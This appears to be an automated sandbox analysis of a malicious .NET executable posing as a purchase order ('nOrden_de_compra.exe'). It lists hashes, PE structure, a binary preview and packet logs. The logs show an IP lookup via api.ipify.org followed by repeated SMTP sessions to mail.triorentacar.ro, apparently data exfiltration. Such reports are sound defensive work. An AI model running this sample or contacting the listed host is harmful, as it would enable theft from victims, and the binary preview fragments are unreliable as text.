                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...{C`...............0..............:... ...@....@.. ....................................@..................................:..O....@.......................`..........p............................................ ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`.......$..............@..B.................:......H............;...............<..........................................^..}.....(.......(.....*.0...........s".....o......(.....*".(.....*..0..+.........,..{.......+....,...{....o........(.....*..0..p.........s....}.....s....}.....s....}.....(......{.... P... ....s....o......{....r...po......{.... .....6s....o......{.....o......{....r...po......{.....o......{...........s....o......{.... P... V...s....o......{....r)..po......{.... .....6s....o......{.....o......{....r9..po...
                                        Process:C:\Users\user\Desktop\nOrden_de_compra.exe
                                        File Type:ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):26
                                        Entropy (8bit):3.95006375643621
                                        Encrypted:false
                                        SSDEEP:3:ggPYV:rPYV
                                        MD5:187F488E27DB4AF347237FE461A079AD
                                        SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                        SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                        SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                        Malicious:false
                                        Preview:[ZoneTransfer]....ZoneId=0
                                        File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                        Entropy (8bit):7.928891623206955
                                        TrID:
                                        • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                        • Win32 Executable (generic) a (10002005/4) 49.78%
                                        • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                        • Generic Win/DOS Executable (2004/3) 0.01%
                                        • DOS Executable Generic (2002/1) 0.01%
                                        File name:nOrden_de_compra.exe
                                        File size:730'624 bytes
                                        MD5:593bb72286c1c2ce5c2456c7d9585a80
                                        SHA1:cb9bf63f9005d5b4f1bcbcf3efead399a1c960a7
                                        SHA256:84f0a1001a606072b86d8eca2c4d9ccefc71c38ff71d0aaa2f4ae003f802917b
                                        SHA512:2fd046fc4730a5e912bfc1cd33cdc2601b159f2b55fbfb86ed6bb966dd5d147586e245bb30bdaaf78b568c814985fc488920faa87fc87d8f9ad0534ab27daf83
                                        SSDEEP:12288:gOd53rD22AAxia+iWUd1jIXbsZ9uXIfa5vWwRkP/l14zAFDQzjgWaqPK6k3LlYl:NrDa5a+iJXIr89fOmnnDQf4bP3LlY
                                        TLSH:D5F4128136BA5FE2C17DDBF825A5858117F23A6B4521FB0CAEC771EF4826F120711A27
                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...{C`...............0..............:... ...@....@.. ....................................@................................
                                        Icon Hash:00928e8e8686b000
                                        Entrypoint:0x4b3ae6
                                        Entrypoint Section:.text
                                        Digitally signed:false
                                        Imagebase:0x400000
                                        Subsystem:windows gui
                                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                        Time Stamp:0xB560437B [Sat Jun 5 17:33:47 2066 UTC]
                                        TLS Callbacks:
                                        CLR (.Net) Version:
                                        OS Version Major:4
                                        OS Version Minor:0
                                        File Version Major:4
                                        File Version Minor:0
                                        Subsystem Version Major:4
                                        Subsystem Version Minor:0
                                        Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                        Instruction
                                        jmp dword ptr [00402000h]
                                        xor eax, 39483732h
                                        inc esp
                                        push eax
                                        push edx
                                        dec eax
                                        xor al, 35h
                                        xor eax, 34374553h
                                        inc esi
                                        dec eax
                                        xor al, 38h
                                        aaa
                                        xor eax, 00000000h
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        NameVirtual AddressVirtual Size Is in Section
                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_IMPORT0xb3a920x4f.text
                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0xb40000x4cc.rsrc
                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0xb60000xc.reloc
                                        IMAGE_DIRECTORY_ENTRY_DEBUG0xb1ba00x70.text
                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                        .text0x20000xb1b040xb1c00e19ea35ec4fd1329aad04e0e94d52111False0.9214959124472574OpenPGP Public Key7.935524491398435IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                        .rsrc0xb40000x4cc0x60076188ffd4997978ae00d4dd7d437a055False0.375data3.7082723271284284IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                        .reloc0xb60000xc0x2000f35781f5f2e411a005a4ff341fc6fdfFalse0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                        RT_VERSION0xb40900x23cdata0.47027972027972026
                                        RT_MANIFEST0xb42dc0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347
                                        DLLImport
                                        mscoree.dll_CorExeMain
                                        TimestampSource PortDest PortSource IPDest IP
                                        Feb 2, 2024 14:04:00.360469103 CET49702443192.168.2.6173.231.16.76
                                        Feb 2, 2024 14:04:00.360503912 CET44349702173.231.16.76192.168.2.6
                                        Feb 2, 2024 14:04:00.360588074 CET49702443192.168.2.6173.231.16.76
                                        Feb 2, 2024 14:04:00.368781090 CET49702443192.168.2.6173.231.16.76
                                        Feb 2, 2024 14:04:00.368798018 CET44349702173.231.16.76192.168.2.6
                                        Feb 2, 2024 14:04:00.849668026 CET44349702173.231.16.76192.168.2.6
                                        Feb 2, 2024 14:04:00.849740028 CET49702443192.168.2.6173.231.16.76
                                        Feb 2, 2024 14:04:00.852282047 CET49702443192.168.2.6173.231.16.76
                                        Feb 2, 2024 14:04:00.852300882 CET44349702173.231.16.76192.168.2.6
                                        Feb 2, 2024 14:04:00.852720022 CET44349702173.231.16.76192.168.2.6
                                        Feb 2, 2024 14:04:01.057991028 CET44349702173.231.16.76192.168.2.6
                                        Feb 2, 2024 14:04:01.058078051 CET49702443192.168.2.6173.231.16.76
                                        Feb 2, 2024 14:04:01.146929979 CET49702443192.168.2.6173.231.16.76
                                        Feb 2, 2024 14:04:01.193903923 CET44349702173.231.16.76192.168.2.6
                                        Feb 2, 2024 14:04:01.302603960 CET44349702173.231.16.76192.168.2.6
                                        Feb 2, 2024 14:04:01.302767038 CET44349702173.231.16.76192.168.2.6
                                        Feb 2, 2024 14:04:01.302828074 CET49702443192.168.2.6173.231.16.76
                                        Feb 2, 2024 14:04:01.308126926 CET49702443192.168.2.6173.231.16.76
                                        Feb 2, 2024 14:04:02.470457077 CET49703587192.168.2.689.32.46.159
                                        Feb 2, 2024 14:04:02.705370903 CET5874970389.32.46.159192.168.2.6
                                        Feb 2, 2024 14:04:02.705459118 CET49703587192.168.2.689.32.46.159
                                        Feb 2, 2024 14:04:02.956008911 CET5874970389.32.46.159192.168.2.6
                                        Feb 2, 2024 14:04:02.956404924 CET49703587192.168.2.689.32.46.159
                                        Feb 2, 2024 14:04:03.190959930 CET5874970389.32.46.159192.168.2.6
                                        Feb 2, 2024 14:04:03.193321943 CET49703587192.168.2.689.32.46.159
                                        Feb 2, 2024 14:04:03.308763981 CET49706443192.168.2.6173.231.16.76
                                        Feb 2, 2024 14:04:03.308816910 CET44349706173.231.16.76192.168.2.6
                                        Feb 2, 2024 14:04:03.308892965 CET49706443192.168.2.6173.231.16.76
                                        Feb 2, 2024 14:04:03.315083027 CET49706443192.168.2.6173.231.16.76
                                        Feb 2, 2024 14:04:03.315104008 CET44349706173.231.16.76192.168.2.6
                                        Feb 2, 2024 14:04:03.429385900 CET5874970389.32.46.159192.168.2.6
                                        Feb 2, 2024 14:04:03.429711103 CET49703587192.168.2.689.32.46.159
                                        Feb 2, 2024 14:04:03.670841932 CET5874970389.32.46.159192.168.2.6
                                        Feb 2, 2024 14:04:03.670888901 CET5874970389.32.46.159192.168.2.6
                                        Feb 2, 2024 14:04:03.670928001 CET5874970389.32.46.159192.168.2.6
                                        Feb 2, 2024 14:04:03.670963049 CET5874970389.32.46.159192.168.2.6
                                        Feb 2, 2024 14:04:03.670965910 CET49703587192.168.2.689.32.46.159
                                        Feb 2, 2024 14:04:03.671084881 CET49703587192.168.2.689.32.46.159
                                        Feb 2, 2024 14:04:03.674313068 CET5874970389.32.46.159192.168.2.6
                                        Feb 2, 2024 14:04:03.704817057 CET49703587192.168.2.689.32.46.159
                                        Feb 2, 2024 14:04:03.788465023 CET44349706173.231.16.76192.168.2.6
                                        Feb 2, 2024 14:04:03.788558006 CET49706443192.168.2.6173.231.16.76
                                        Feb 2, 2024 14:04:03.790569067 CET49706443192.168.2.6173.231.16.76
                                        Feb 2, 2024 14:04:03.790582895 CET44349706173.231.16.76192.168.2.6
                                        Feb 2, 2024 14:04:03.790884018 CET44349706173.231.16.76192.168.2.6
                                        Feb 2, 2024 14:04:03.902555943 CET49706443192.168.2.6173.231.16.76
                                        Feb 2, 2024 14:04:03.939366102 CET5874970389.32.46.159192.168.2.6
                                        Feb 2, 2024 14:04:03.945944071 CET44349706173.231.16.76192.168.2.6
                                        Feb 2, 2024 14:04:03.946571112 CET49703587192.168.2.689.32.46.159
                                        Feb 2, 2024 14:04:04.089679956 CET44349706173.231.16.76192.168.2.6
                                        Feb 2, 2024 14:04:04.089828014 CET44349706173.231.16.76192.168.2.6
                                        Feb 2, 2024 14:04:04.090040922 CET49706443192.168.2.6173.231.16.76
                                        Feb 2, 2024 14:04:04.103243113 CET49706443192.168.2.6173.231.16.76
                                        Feb 2, 2024 14:04:04.181974888 CET5874970389.32.46.159192.168.2.6
                                        Feb 2, 2024 14:04:04.183073997 CET49703587192.168.2.689.32.46.159
                                        Feb 2, 2024 14:04:04.418435097 CET5874970389.32.46.159192.168.2.6
                                        Feb 2, 2024 14:04:04.419512033 CET49703587192.168.2.689.32.46.159
                                        Feb 2, 2024 14:04:04.665285110 CET5874970389.32.46.159192.168.2.6
                                        Feb 2, 2024 14:04:04.665512085 CET49703587192.168.2.689.32.46.159
                                        Feb 2, 2024 14:04:04.701335907 CET49707587192.168.2.689.32.46.159
                                        Feb 2, 2024 14:04:04.900806904 CET5874970389.32.46.159192.168.2.6
                                        Feb 2, 2024 14:04:04.901240110 CET49703587192.168.2.689.32.46.159
                                        Feb 2, 2024 14:04:04.931474924 CET5874970789.32.46.159192.168.2.6
                                        Feb 2, 2024 14:04:04.931577921 CET49707587192.168.2.689.32.46.159
                                        Feb 2, 2024 14:04:05.166806936 CET5874970789.32.46.159192.168.2.6
                                        Feb 2, 2024 14:04:05.167021036 CET49707587192.168.2.689.32.46.159
                                        Feb 2, 2024 14:04:05.175033092 CET5874970389.32.46.159192.168.2.6
                                        Feb 2, 2024 14:04:05.397469997 CET5874970789.32.46.159192.168.2.6
                                        Feb 2, 2024 14:04:05.397617102 CET49707587192.168.2.689.32.46.159
                                        Feb 2, 2024 14:04:05.445977926 CET5874970389.32.46.159192.168.2.6
                                        Feb 2, 2024 14:04:05.446211100 CET49703587192.168.2.689.32.46.159
                                        Feb 2, 2024 14:04:05.630676985 CET5874970789.32.46.159192.168.2.6
                                        Feb 2, 2024 14:04:05.631007910 CET49707587192.168.2.689.32.46.159
                                        Feb 2, 2024 14:04:05.680694103 CET5874970389.32.46.159192.168.2.6
                                        Feb 2, 2024 14:04:05.680937052 CET5874970389.32.46.159192.168.2.6
                                        Feb 2, 2024 14:04:05.681514978 CET49703587192.168.2.689.32.46.159
                                        Feb 2, 2024 14:04:05.681587934 CET49703587192.168.2.689.32.46.159
                                        Feb 2, 2024 14:04:05.681611061 CET49703587192.168.2.689.32.46.159
                                        Feb 2, 2024 14:04:05.681648970 CET49703587192.168.2.689.32.46.159
                                        Feb 2, 2024 14:04:05.869987965 CET5874970789.32.46.159192.168.2.6
                                        Feb 2, 2024 14:04:05.870034933 CET5874970789.32.46.159192.168.2.6
                                        Feb 2, 2024 14:04:05.870074034 CET5874970789.32.46.159192.168.2.6
                                        Feb 2, 2024 14:04:05.870107889 CET5874970789.32.46.159192.168.2.6
                                        Feb 2, 2024 14:04:05.870498896 CET49707587192.168.2.689.32.46.159
                                        Feb 2, 2024 14:04:05.872653961 CET5874970789.32.46.159192.168.2.6
                                        Feb 2, 2024 14:04:05.874347925 CET49707587192.168.2.689.32.46.159
                                        Feb 2, 2024 14:04:05.916944981 CET5874970389.32.46.159192.168.2.6
                                        Feb 2, 2024 14:04:05.916960955 CET5874970389.32.46.159192.168.2.6
                                        Feb 2, 2024 14:04:05.916990042 CET5874970389.32.46.159192.168.2.6
                                        Feb 2, 2024 14:04:05.917006016 CET5874970389.32.46.159192.168.2.6
                                        Feb 2, 2024 14:04:05.920459986 CET5874970389.32.46.159192.168.2.6
                                        Feb 2, 2024 14:04:05.966891050 CET49703587192.168.2.689.32.46.159
                                        Feb 2, 2024 14:04:05.976476908 CET49703587192.168.2.689.32.46.159
                                        Feb 2, 2024 14:04:06.105510950 CET5874970789.32.46.159192.168.2.6
                                        Feb 2, 2024 14:04:06.114747047 CET49707587192.168.2.689.32.46.159
                                        Feb 2, 2024 14:04:06.214890003 CET5874970389.32.46.159192.168.2.6
                                        Feb 2, 2024 14:04:06.215949059 CET49703587192.168.2.689.32.46.159
                                        Feb 2, 2024 14:04:06.217500925 CET49708587192.168.2.689.32.46.159
                                        Feb 2, 2024 14:04:06.345110893 CET5874970789.32.46.159192.168.2.6
                                        Feb 2, 2024 14:04:06.345587015 CET49707587192.168.2.689.32.46.159
                                        Feb 2, 2024 14:04:06.451864958 CET5874970889.32.46.159192.168.2.6
                                        Feb 2, 2024 14:04:06.452308893 CET49708587192.168.2.689.32.46.159
                                        Feb 2, 2024 14:04:06.578572989 CET5874970789.32.46.159192.168.2.6
                                        Feb 2, 2024 14:04:06.582745075 CET49707587192.168.2.689.32.46.159
                                        Feb 2, 2024 14:04:06.695008039 CET5874970889.32.46.159192.168.2.6
                                        Feb 2, 2024 14:04:06.695219040 CET49708587192.168.2.689.32.46.159
                                        Feb 2, 2024 14:04:06.815485954 CET5874970789.32.46.159192.168.2.6
                                        Feb 2, 2024 14:04:06.815884113 CET49707587192.168.2.689.32.46.159
                                        Feb 2, 2024 14:04:06.929497004 CET5874970889.32.46.159192.168.2.6
                                        Feb 2, 2024 14:04:06.929670095 CET49708587192.168.2.689.32.46.159
                                        Feb 2, 2024 14:04:07.049573898 CET5874970789.32.46.159192.168.2.6
                                        Feb 2, 2024 14:04:07.049866915 CET49707587192.168.2.689.32.46.159
                                        Feb 2, 2024 14:04:07.165019989 CET5874970889.32.46.159192.168.2.6
                                        Feb 2, 2024 14:04:07.165621042 CET49708587192.168.2.689.32.46.159
                                        Feb 2, 2024 14:04:07.292325020 CET5874970789.32.46.159192.168.2.6
                                        Feb 2, 2024 14:04:07.292546034 CET49707587192.168.2.689.32.46.159
                                        Feb 2, 2024 14:04:07.406465054 CET5874970889.32.46.159192.168.2.6
                                        Feb 2, 2024 14:04:07.406527042 CET5874970889.32.46.159192.168.2.6
                                        Feb 2, 2024 14:04:07.406565905 CET5874970889.32.46.159192.168.2.6
                                        Feb 2, 2024 14:04:07.406578064 CET49708587192.168.2.689.32.46.159
                                        Feb 2, 2024 14:04:07.406605005 CET5874970889.32.46.159192.168.2.6
                                        Feb 2, 2024 14:04:07.406655073 CET49708587192.168.2.689.32.46.159
                                        Feb 2, 2024 14:04:07.409179926 CET5874970889.32.46.159192.168.2.6
                                        Feb 2, 2024 14:04:07.410957098 CET49708587192.168.2.689.32.46.159
                                        Feb 2, 2024 14:04:07.524283886 CET5874970789.32.46.159192.168.2.6
                                        Feb 2, 2024 14:04:07.525074959 CET49707587192.168.2.689.32.46.159
                                        Feb 2, 2024 14:04:07.525141001 CET49707587192.168.2.689.32.46.159
                                        Feb 2, 2024 14:04:07.525180101 CET49707587192.168.2.689.32.46.159
                                        Feb 2, 2024 14:04:07.525214911 CET49707587192.168.2.689.32.46.159
                                        Feb 2, 2024 14:04:07.646472931 CET5874970889.32.46.159192.168.2.6
                                        Feb 2, 2024 14:04:07.647690058 CET49708587192.168.2.689.32.46.159
                                        Feb 2, 2024 14:04:07.755373001 CET5874970789.32.46.159192.168.2.6
                                        Feb 2, 2024 14:04:07.755388021 CET5874970789.32.46.159192.168.2.6
                                        Feb 2, 2024 14:04:07.755397081 CET5874970789.32.46.159192.168.2.6
                                        Feb 2, 2024 14:04:07.755408049 CET5874970789.32.46.159192.168.2.6
                                        Feb 2, 2024 14:04:07.757992983 CET5874970789.32.46.159192.168.2.6
                                        Feb 2, 2024 14:04:07.805370092 CET49707587192.168.2.689.32.46.159
                                        Feb 2, 2024 14:04:07.884782076 CET5874970889.32.46.159192.168.2.6
                                        Feb 2, 2024 14:04:07.885087967 CET49708587192.168.2.689.32.46.159
                                        Feb 2, 2024 14:04:08.037220001 CET5874970789.32.46.159192.168.2.6
                                        Feb 2, 2024 14:04:08.039974928 CET49707587192.168.2.689.32.46.159
                                        Feb 2, 2024 14:04:08.039988995 CET49709587192.168.2.689.32.46.159
                                        Feb 2, 2024 14:04:08.119826078 CET5874970889.32.46.159192.168.2.6
                                        Feb 2, 2024 14:04:08.120147943 CET49708587192.168.2.689.32.46.159
                                        Feb 2, 2024 14:04:08.274337053 CET5874970989.32.46.159192.168.2.6
                                        Feb 2, 2024 14:04:08.275394917 CET49709587192.168.2.689.32.46.159
                                        Feb 2, 2024 14:04:08.356646061 CET5874970889.32.46.159192.168.2.6
                                        Feb 2, 2024 14:04:08.359342098 CET49708587192.168.2.689.32.46.159
                                        Feb 2, 2024 14:04:08.511997938 CET5874970989.32.46.159192.168.2.6
                                        Feb 2, 2024 14:04:08.512509108 CET49709587192.168.2.689.32.46.159
                                        Feb 2, 2024 14:04:08.594249010 CET5874970889.32.46.159192.168.2.6
                                        Feb 2, 2024 14:04:08.594665051 CET49708587192.168.2.689.32.46.159
                                        Feb 2, 2024 14:04:08.745165110 CET5874970989.32.46.159192.168.2.6
                                        Feb 2, 2024 14:04:08.745388031 CET49709587192.168.2.689.32.46.159
                                        Feb 2, 2024 14:04:08.838191986 CET5874970889.32.46.159192.168.2.6
                                        Feb 2, 2024 14:04:08.838422060 CET49708587192.168.2.689.32.46.159
                                        Feb 2, 2024 14:04:08.979149103 CET5874970989.32.46.159192.168.2.6
                                        Feb 2, 2024 14:04:08.979815960 CET49709587192.168.2.689.32.46.159
                                        Feb 2, 2024 14:04:09.072380066 CET5874970889.32.46.159192.168.2.6
                                        Feb 2, 2024 14:04:09.074153900 CET49708587192.168.2.689.32.46.159
                                        Feb 2, 2024 14:04:09.074296951 CET49708587192.168.2.689.32.46.159
                                        Feb 2, 2024 14:04:09.074404955 CET49708587192.168.2.689.32.46.159
                                        Feb 2, 2024 14:04:09.074557066 CET49708587192.168.2.689.32.46.159
                                        Feb 2, 2024 14:04:09.074647903 CET49708587192.168.2.689.32.46.159
                                        Feb 2, 2024 14:04:09.074707985 CET49708587192.168.2.689.32.46.159
                                        Feb 2, 2024 14:04:09.074769974 CET49708587192.168.2.689.32.46.159
                                        Feb 2, 2024 14:04:09.074822903 CET49708587192.168.2.689.32.46.159
                                        Feb 2, 2024 14:04:09.074863911 CET49708587192.168.2.689.32.46.159
                                        Feb 2, 2024 14:04:09.074975967 CET49708587192.168.2.689.32.46.159
                                        Feb 2, 2024 14:04:09.218929052 CET5874970989.32.46.159192.168.2.6
                                        Feb 2, 2024 14:04:09.218990088 CET5874970989.32.46.159192.168.2.6
                                        Feb 2, 2024 14:04:09.219031096 CET5874970989.32.46.159192.168.2.6
                                        Feb 2, 2024 14:04:09.219058990 CET49709587192.168.2.689.32.46.159
                                        Feb 2, 2024 14:04:09.219085932 CET5874970989.32.46.159192.168.2.6
                                        Feb 2, 2024 14:04:09.219136953 CET49709587192.168.2.689.32.46.159
                                        Feb 2, 2024 14:04:09.221335888 CET5874970989.32.46.159192.168.2.6
                                        Feb 2, 2024 14:04:09.224097967 CET49709587192.168.2.689.32.46.159
                                        Feb 2, 2024 14:04:09.308150053 CET5874970889.32.46.159192.168.2.6
                                        Feb 2, 2024 14:04:09.308190107 CET5874970889.32.46.159192.168.2.6
                                        Feb 2, 2024 14:04:09.308278084 CET5874970889.32.46.159192.168.2.6
                                        Feb 2, 2024 14:04:09.308310986 CET5874970889.32.46.159192.168.2.6
                                        Feb 2, 2024 14:04:09.308343887 CET5874970889.32.46.159192.168.2.6
                                        Feb 2, 2024 14:04:09.308376074 CET5874970889.32.46.159192.168.2.6
                                        Feb 2, 2024 14:04:09.308408022 CET5874970889.32.46.159192.168.2.6
                                        Feb 2, 2024 14:04:09.308439970 CET5874970889.32.46.159192.168.2.6
                                        Feb 2, 2024 14:04:09.308626890 CET5874970889.32.46.159192.168.2.6
                                        Feb 2, 2024 14:04:09.308942080 CET5874970889.32.46.159192.168.2.6
                                        Feb 2, 2024 14:04:09.312289000 CET5874970889.32.46.159192.168.2.6
                                        Feb 2, 2024 14:04:09.356471062 CET49708587192.168.2.689.32.46.159
                                        Feb 2, 2024 14:04:09.456953049 CET5874970989.32.46.159192.168.2.6
                                        Feb 2, 2024 14:04:09.497320890 CET49709587192.168.2.689.32.46.159
                                        Feb 2, 2024 14:04:09.512399912 CET49709587192.168.2.689.32.46.159
                                        Feb 2, 2024 14:04:09.745264053 CET5874970989.32.46.159192.168.2.6
                                        Feb 2, 2024 14:04:09.745798111 CET49709587192.168.2.689.32.46.159
                                        Feb 2, 2024 14:04:09.979006052 CET5874970989.32.46.159192.168.2.6
                                        Feb 2, 2024 14:04:09.981270075 CET49709587192.168.2.689.32.46.159
                                        Feb 2, 2024 14:04:10.216989994 CET5874970989.32.46.159192.168.2.6
                                        Feb 2, 2024 14:04:10.217293024 CET49709587192.168.2.689.32.46.159
                                        Feb 2, 2024 14:04:10.449932098 CET5874970989.32.46.159192.168.2.6
                                        Feb 2, 2024 14:04:10.450521946 CET49709587192.168.2.689.32.46.159
                                        Feb 2, 2024 14:04:10.691304922 CET5874970989.32.46.159192.168.2.6
                                        Feb 2, 2024 14:04:10.691597939 CET49709587192.168.2.689.32.46.159
                                        Feb 2, 2024 14:04:10.924274921 CET5874970989.32.46.159192.168.2.6
                                        Feb 2, 2024 14:04:10.925040007 CET49709587192.168.2.689.32.46.159
                                        Feb 2, 2024 14:04:10.925144911 CET49709587192.168.2.689.32.46.159
                                        Feb 2, 2024 14:04:10.925216913 CET49709587192.168.2.689.32.46.159
                                        Feb 2, 2024 14:04:10.925293922 CET49709587192.168.2.689.32.46.159
                                        Feb 2, 2024 14:04:10.925376892 CET49709587192.168.2.689.32.46.159
                                        Feb 2, 2024 14:04:10.925451040 CET49709587192.168.2.689.32.46.159
                                        Feb 2, 2024 14:04:10.925524950 CET49709587192.168.2.689.32.46.159
                                        Feb 2, 2024 14:04:10.925586939 CET49709587192.168.2.689.32.46.159
                                        Feb 2, 2024 14:04:10.925642014 CET49709587192.168.2.689.32.46.159
                                        Feb 2, 2024 14:04:10.925703049 CET49709587192.168.2.689.32.46.159
                                        Feb 2, 2024 14:04:11.157469988 CET5874970989.32.46.159192.168.2.6
                                        Feb 2, 2024 14:04:11.157514095 CET5874970989.32.46.159192.168.2.6
                                        Feb 2, 2024 14:04:11.157546997 CET5874970989.32.46.159192.168.2.6
                                        Feb 2, 2024 14:04:11.157578945 CET5874970989.32.46.159192.168.2.6
                                        Feb 2, 2024 14:04:11.157609940 CET5874970989.32.46.159192.168.2.6
                                        Feb 2, 2024 14:04:11.157641888 CET5874970989.32.46.159192.168.2.6
                                        Feb 2, 2024 14:04:11.157690048 CET5874970989.32.46.159192.168.2.6
                                        Feb 2, 2024 14:04:11.157721043 CET5874970989.32.46.159192.168.2.6
                                        Feb 2, 2024 14:04:11.157753944 CET5874970989.32.46.159192.168.2.6
                                        Feb 2, 2024 14:04:11.158523083 CET5874970989.32.46.159192.168.2.6
                                        Feb 2, 2024 14:04:11.161515951 CET5874970989.32.46.159192.168.2.6
                                        Feb 2, 2024 14:04:11.215883017 CET49709587192.168.2.689.32.46.159
                                        Feb 2, 2024 14:05:41.872473001 CET49708587192.168.2.689.32.46.159
                                        Feb 2, 2024 14:05:42.107810974 CET5874970889.32.46.159192.168.2.6
                                        Feb 2, 2024 14:05:42.109292030 CET49708587192.168.2.689.32.46.159
                                        Feb 2, 2024 14:05:44.716171980 CET49709587192.168.2.689.32.46.159
                                        Feb 2, 2024 14:05:44.949645996 CET5874970989.32.46.159192.168.2.6
                                        Feb 2, 2024 14:05:44.950527906 CET49709587192.168.2.689.32.46.159
                                        TimestampSource PortDest PortSource IPDest IP
                                        Feb 2, 2024 14:04:00.208085060 CET4994153192.168.2.61.1.1.1
                                        Feb 2, 2024 14:04:00.325644970 CET53499411.1.1.1192.168.2.6
                                        Feb 2, 2024 14:04:01.848052979 CET5741953192.168.2.61.1.1.1
                                        Feb 2, 2024 14:04:02.469059944 CET53574191.1.1.1192.168.2.6
                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                        Feb 2, 2024 14:04:00.208085060 CET192.168.2.61.1.1.10xac4bStandard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                        Feb 2, 2024 14:04:01.848052979 CET192.168.2.61.1.1.10x96c0Standard query (0)mail.triorentacar.roA (IP address)IN (0x0001)false
                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                        Feb 2, 2024 14:04:00.325644970 CET1.1.1.1192.168.2.60xac4bNo error (0)api.ipify.orgapi4.ipify.orgCNAME (Canonical name)IN (0x0001)false
                                        Feb 2, 2024 14:04:00.325644970 CET1.1.1.1192.168.2.60xac4bNo error (0)api4.ipify.org173.231.16.76A (IP address)IN (0x0001)false
                                        Feb 2, 2024 14:04:00.325644970 CET1.1.1.1192.168.2.60xac4bNo error (0)api4.ipify.org104.237.62.212A (IP address)IN (0x0001)false
                                        Feb 2, 2024 14:04:00.325644970 CET1.1.1.1192.168.2.60xac4bNo error (0)api4.ipify.org64.185.227.156A (IP address)IN (0x0001)false
